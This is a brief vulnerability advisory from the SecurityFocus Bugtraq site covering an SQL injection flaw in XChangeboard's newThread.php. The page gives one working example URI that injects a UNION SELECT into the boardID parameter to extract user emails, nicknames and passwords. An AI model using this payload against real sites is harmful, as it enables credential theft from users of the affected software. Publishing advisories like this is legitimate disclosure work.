Search: Home Bugtraq Vulnerabilities Mailing Lists Jobs Tools Beta Programs

XChangeboard 'newThread.php' SQL Injection Vulnerability

Attackers can exploit these issues via a browser.

The following example URI is available:

http://www.example.com/path/newThread.php?boardID=+999999%20union%20select%20email,concat_ws(0x3a,nick,substring(password,1,100)),email,email,email%20from%20user/*







 

Privacy Statement
Copyright 2009, SecurityFocus